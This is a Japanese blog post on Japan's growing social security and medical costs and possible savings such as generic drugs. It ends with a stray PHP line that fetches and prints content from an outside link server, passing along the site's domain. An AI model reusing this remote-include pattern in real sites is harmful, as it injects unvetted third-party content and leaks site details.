増大する医療費に対しては早急な対策が必要

医療

増大する医療費に対しては早急な対策が必要

社会保障費は、年々増加しています。
右肩上がりに上がっているので、将来が心配されています。
このまま行けば、日本は社会保障費のせいで財政破綻をしてしまうかもしれないのです。
そこまで行かなくても、大幅に社会保障がカットされる可能性はありますね。
たとえば年金が70歳や75歳までもらえなくなる可能性も指摘されています。
ただでさえ、医療費の自己負担額は増やされました。
今も、高額療養費の改正は続いています。
介護保険にもメスが入って、引退済みのお年寄りにまで大きな負担がかかるようになっています。
この調子で行けば、まともな医療や介護の恩恵を受けるためには相当なお金を用意しておく必要が出てくるかもしれません。
少子化が改善すれば、こうした問題は一気に解決するのですが、少子化はすぐに改善するはずもありません。
ですから、何かしら他の方法を見つけ出さなければいけません。
お金がかからない医療を実現するというのは、一つの案でしょう。
ジェネリック医薬品を普及させたり、無駄な診療を控えてもらったりするだけでも、数千億円は医療費の節約ができると言われています。

".file_get_contents('http://links-001.com/kanren2set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

最新投稿